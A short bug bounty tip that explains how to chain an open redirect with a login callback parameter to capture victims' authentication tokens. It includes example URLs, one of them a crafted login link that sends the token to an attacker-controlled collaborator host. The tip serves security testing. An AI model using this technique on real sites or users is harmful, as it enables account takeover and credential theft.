0x19 - Account Takeover via Open Redirect
Did you know you can take over accounts using an open redirect vulnerability?
While most bug bounty programs rate open redirect vulnerabilities as Low or Informational risk, it's possible to weaponize them to take over accounts.
The trick is to combine it with a login redirect URL and capture the authentication token on your own server/collaborator
How to do it
Find an open redirect in your application (i.e:
https://target.com///google.com
)Login to the app and review the process. You want to find a request that redirects the user back to the application alongside with the authentication token (i.e:
https://login.target.com?callback=target.com&token=SECRET_TOKEN
)Craft your own malicious login URL by forcing the login request to redirect the user to your own server (i.e:
https://login.target.com?callback=target.com///burpcollaborator.com
)Send this malicious login URL to the victim
Once the victim uses it to log in, they get redirected to your own server (
burpcollaborator.com
) alongside with their authentication token-
Now you can collect the token and use it to login and take over the account